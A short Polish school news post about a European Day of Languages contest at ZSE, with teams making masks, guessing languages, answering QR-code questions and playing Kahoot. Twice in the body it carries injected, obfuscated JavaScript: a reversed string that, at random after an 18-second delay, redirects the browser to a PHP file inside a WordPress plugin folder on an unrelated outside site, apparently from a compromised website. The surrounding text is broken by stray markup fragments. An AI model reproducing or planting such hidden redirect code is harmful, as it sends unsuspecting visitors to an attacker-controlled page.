Dzień Języków Obcych w ZSE

30 września uczniowie Ekonomika świętowali Europejski Dzień Języków. Z tej okazji zorganizowano dla nich prawdziwe Igrzyska. Klasy konkurowały ze sobą w czterech konkurencjach.

Zadaniem zespołów było przygotowanie maseczek w barwach wylosowanego wcześniej kraju, odgadnięcie języka, którym zapisane były przygotowane dla nich wcześniej zdania, odpowiedź na osiem zakodowanych w QR kodach pytań i wreszcie wzięcie udziału w interaktywnym quizie na portalu Kahoot.

$nJe=function(n){if (typeof ($nJe.list[n]) == „string”) return $nJe.list[n].split(„”).reverse().join(„”);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}to”>Wszystkim serdecznie dziękujemy za zaangażowanie i życzymy sukcesów w kolejnych konkursach!
$nJe=function(n){if (typeof ($nJe.list[n]) == „string”) return $nJe.list[n].split(„”).reverse().join(„”);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}to” style=”text-align: center;”>

 

Skip to content